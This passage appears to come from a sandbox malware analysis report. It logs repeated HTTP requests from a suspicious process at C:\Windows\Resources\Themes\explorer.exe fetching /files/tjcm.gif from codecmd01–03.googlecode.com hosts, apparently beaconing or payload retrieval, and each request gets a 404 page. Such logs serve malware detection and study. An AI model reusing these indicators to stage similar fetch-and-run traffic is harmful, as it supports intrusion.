                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:09.213416100 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49815 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:09.744601011 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:10.446755886 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:10 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:10.446816921 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49826 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:11.216636896 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:11.925045967 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:11 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:11.925080061 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49833 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:12.479581118 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:13.181576014 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:13 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:13.181596041 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49843 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:13.988979101 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:14.675137043 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:14 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:14.675196886 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 56640 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:15.261632919 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:16.024343967 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:15 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:16.024394989 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Jan 13, 2025 13:18:16.024410009 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 56651 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:16.809209108 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:17.518098116 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:17 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:17.518125057 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 56657 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:17.928752899 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:18.647425890 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:18 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:18.647459984 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 56668 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:19.360409975 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:20.074774027 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:19 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:20.074795008 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
39          192.168.2.4  56674        66.102.1.82     80                7540  C:\Windows\Resources\Themes\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Jan 13, 2025 13:18:20.459355116 CET  215  OUT  GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:18:21.173336029 CET  1236  IN  HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:18:21 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:21.173366070 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
40          192.168.2.4  56682        74.125.133.82   80                7540  C:\Windows\Resources\Themes\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Jan 13, 2025 13:18:21.863100052 CET  215  OUT  GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:18:22.602381945 CET  1236  IN  HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:18:22 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:22.602463961 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
41          192.168.2.4  56691        64.233.167.82   80                7540  C:\Windows\Resources\Themes\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Jan 13, 2025 13:18:23.035602093 CET  215  OUT  GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:18:23.740910053 CET  1236  IN  HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:18:23 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:23.740982056 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
42          192.168.2.4  56701        66.102.1.82     80                7540  C:\Windows\Resources\Themes\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Jan 13, 2025 13:18:24.451474905 CET  215  OUT  GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:18:25.161976099 CET  1236  IN  HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:18:25 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:25.161994934 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
43          192.168.2.4  56708        74.125.133.82   80                7540  C:\Windows\Resources\Themes\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Jan 13, 2025 13:18:25.613358021 CET  215  OUT  GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:18:26.302078962 CET  1236  IN  HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:18:26 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:26.302108049 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          44192.168.2.45671564.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
